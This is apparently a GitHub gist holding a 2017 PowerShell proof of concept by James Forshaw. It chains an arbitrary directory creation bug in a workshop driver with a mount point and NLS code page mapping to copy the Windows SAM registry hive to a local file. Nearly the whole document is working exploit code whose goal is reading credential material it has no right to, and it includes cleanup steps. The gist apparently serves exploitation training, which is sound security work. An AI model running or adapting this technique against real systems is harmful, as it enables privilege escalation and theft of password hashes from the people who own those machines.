Instantly share code, notes, and snippets.

Embed
What would you like to do?
# Simple example when combined with an arbitrary direction creation
# vulnerability to read out the SAM registry hive file.
# Written by James Forshaw 2017
Import-Module NtObjectManager
# Get an IOCTL for the workshop driver.
function Get-DriverIoCtl
{
Param([int]$ControlCode)
[NtApiDotNet.NtIoControlCode]::new("Unknown",`
0x800 -bor $ControlCode, "Buffered", "Any")
}
function New-Directory {
Param([string]$Filename)
# Open the device driver.
Use-NtObject($file = Get-NtFile \Device\WorkshopDriver) {
# Get IOCTL for ControlCreateDir (2)
$ioctl = Get-DriverIoCtl -ControlCode 2
# Convert DOS filename to NT
$bytes = [Text.Encoding]::Unicode.GetBytes($Filename)
$file.DeviceIoControl($ioctl, $bytes, 0) | Out-Null
}
}
function Remove-Directory {
Param([string]$Filename)
try {
Use-NtObject($file = Get-NtFile $Filename `
-Access Delete `
-Options DeleteOnClose,OpenReparsePoint,DirectoryFile) {
}
} catch {
}
}
try {
# We'll use the CP 1337 file.
$dir = "\SystemRoot\system32\c_1337.nls"
Remove-Directory $dir
# Create new directory.
New-Directory $dir
# Set directory as a mount point to the SAM hive file.
$target_path = "\SystemRoot\system32\config\SAM"
Use-NtObject($file = Get-NtFile $dir -Options OpenReparsePoint,DirectoryFile) {
$file.SetMountPoint($target_path, $target_path)
}
# Get mapped file and write it to sam.bin
Use-NtObject($map = [NtApiDotNet.NtLocale]::GetNlsSectionPtr("CodePage", 1337)) {
Use-NtObject($output = [IO.File]::OpenWrite("sam.bin")) {
$map.GetStream().CopyTo($output)
Write-Host "Copied file"
}
}
# Delete section object.
Use-NtObject($sect = Get-NtSection \nls\NlsSectionCP1337 `
-Access Delete) {
$sect.MakeTemporary()
}
Remove-Directory $dir
} catch {
Write-Host $_
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment